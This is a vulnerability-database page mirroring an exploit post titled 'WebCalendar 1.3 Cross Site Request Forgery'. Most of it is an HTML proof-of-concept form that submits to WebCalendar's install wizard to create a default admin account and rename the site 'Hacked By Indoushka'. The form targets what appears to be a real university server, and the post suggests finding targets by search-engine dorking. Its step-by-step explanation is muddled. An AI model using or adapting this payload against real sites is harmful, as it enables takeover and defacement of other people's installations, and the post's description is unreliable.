Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIndoushkaPACKETSTORM:173935
HistoryAug 03, 2023 - 12:00 a.m.

WebCalendar 1.3 Cross Site Request Forgery

2023-08-0300:00:00
indoushka
packetstormsecurity.com
136
webcalendar 1.3
csrf
vulnerability
indoushka
poc.html
admin creation
JSON
`====================================================================================================================================  
| # Title : WebCalendar v1.3 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |   
| # Vendor : https://github.com/craigk5n/webcalendar/archive/master.zip |   
| # Dork : WebCalendar v1.3 |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking Δ°n Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 173.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : install/index.php.  
  
[+] http://127.0.0.1/q7.3/admin/settings.php.  
  
[+] save code as poc.html .  
  
[+] <?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  
"DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  
<head>  
<title>WebCalendar Setup Wizard</title>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />  
<script>  
<!-- <![CDATA[  
var xlate = [];  
xlate['invalidColor'] = 'Invalid Color';  
  
function testPHPInfo() {  
var url = "index.php?action=phpinfo";  
  
window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' );  
}  
function validate( form ) {  
// Only check to make sure single-user login is specified  
// if in single-user mode.  
var  
err = '',  
form = document.form_app_settings,  
listid = 0; // Find id of single user object.  
  
for( i = 0; i < form.form_user_inc.length; i++ ) {  
if( form.form_user_inc.options[i].value == 'none' )  
listid = i;  
}  
if( form.form_user_inc.options[listid].selected ) {  
if( form.form_single_user_login.value.length == 0 ) {  
// No single user login specified.  
alert( 'Error: You must specify a\nSingle-User Login.' );  
form.form_single_user_login.focus();  
return false;  
}  
}  
if( form.form_server_url.value == '' ) {  
err += "Server URL is required.\n";  
form.form_server_url.select();  
form.form_server_url.focus();  
}  
else if( form.form_server_url.value.charAt(  
form.form_server_url.value.length - 1 ) != '/' ) {  
err += "Server URL must end with a slash(/).\n";  
form.form_server_url.select();  
form.form_server_url.focus();  
}  
if( err != '' ) {  
alert( "Error:\n\n" + err );  
return false;  
}  
// Submit form...  
form.submit();  
}  
function auth_handler() {  
var  
form = document.form_app_settings,  
listid = 0; // Find id of single user object.  
for( i = 0; i < form.form_user_inc.length; i++ ) {  
if( form.form_user_inc.options[i].value == 'none' )  
listid = i;  
}  
if( form.form_user_inc.options[listid].selected ) {  
makeVisible( 'singleuser' );  
} else {  
makeInvisible( 'singleuser' );  
}  
}  
function db_type_handler() {  
var  
form = document.dbform,  
listid = 0,  
selectvalue = form.form_db_type.value;  
  
if( selectvalue == 'sqlite' || $db_type == 'sqlite3'  
|| selectvalue == 'ibase' ) {  
form.form_db_database.size = 65;  
document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)';  
} else {  
form.form_db_database.size = 20;  
document.getElementById( 'db_name' ).innerHTML = 'Database Name: ';  
}  
}  
function chkPassword() {  
var  
form = document.dbform,  
db_pass = form.form_db_password.value,  
illegalChars = /\#/;  
// Do not allow #.../\#/ would stop all non-alphanumeric.  
  
if( illegalChars.test( db_pass ) ) {  
alert( 'The password contains illegal characters.' );  
form.form_db_password.select();  
form.form_db_password.focus();  
return false;  
}  
}  
//]]> -->  
</script>  
<script src="../includes/js/visible.js"></script>  
<style>  
body {  
margin:0;  
background:#fff;  
font-family:Arial, Helvetica, sans-serif;  
}  
table {  
border:0;  
}  
th.header,  
th.pageheader,  
th.redheader {  
background:#eee;  
}  
th.pageheader {  
padding:10px;  
font-size:18px;  
}  
th.header,  
th.redheader {  
font-size:14px;  
}  
th.redheader,  
.notrecommended {  
color:red;  
}  
td {  
padding:5px;  
}  
td.prompt,  
td.subprompt {  
padding-right:20px;  
font-weight:bold;  
}  
td.subprompt {  
font-size:12px;  
}  
div.nav {  
margin:0;  
border-bottom:1px solid #000;  
}  
div.main {  
margin:10px;  
}  
li {  
margin-top:10px;  
}  
doc.li {  
margin-top:5px;  
}  
.recommended {  
color:green;  
}  
</style>  
</head>  
<body onload="auth_handler();">  
<table border="1" width="90%" class="aligncenter">  
<th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>  
<tr>  
<td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>  
</tr>  
<th class="header" colspan="2">Application Settings</th>  
<tr>  
<td colspan="2">  
<ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>  
</td>  
</tr>  
<tr>  
<td>  
<table width="75%" class="aligncenter">  
<tr>  
<form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">  
<input type="hidden" name="app_settings" value="1" />  
<td class="prompt">Create Default Admin Account:</td>  
<td>  
<input type="checkbox" name="load_admin" value="Yes" />  
<span class="notrecommended"> (Admin Account Not Found)</span>  
</td>  
</tr>  
<tr>  
<td class="prompt">Application Name:</td>  
<td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>  
</tr>  
<tr>  
<td class="prompt">Server URL:</td>  
<td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>  
</tr>  
<tr>  
<td class="prompt">User Authentication:</td>  
<td>  
<select name="form_user_inc" onChange="auth_handler()">  
<option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>  
<option value="http">Web Server (not detected)</option>  
<option value="user-imap.php">IMAP</option>  
<option value="none" >None (Single-User)</option>  
</select>  
</td>  
</tr>  
<tr id="singleuser">  
<td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>  
<td><input name="form_single_user_login" size="20" value="" /></td>  
</tr>  
<tr>  
<td class="prompt">Read-Only:</td>  
<td>  
<input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;  
<input name="form_readonly" value="false" type="radio" checked="checked" />No  
</td>  
</tr>  
<tr>  
<td class="prompt">Environment:</td>  
<td>  
<select name="form_mode">  
<option value="prod" selected="selected">Production</option>  
<option value="dev">Development</option>  
</select>  
</td>  
</tr>  
</table>  
</td>  
</tr>  
</table>  
<table width="80%" class="aligncenter">  
<tr>  
<td class="aligncenter">  
<input name="action" type="button" value="Save Settings" onClick="return validate();" />  
<input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />  
</form>  
</td>  
</tr>  
</table> </body>  
</html>  
  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================  
`
JSON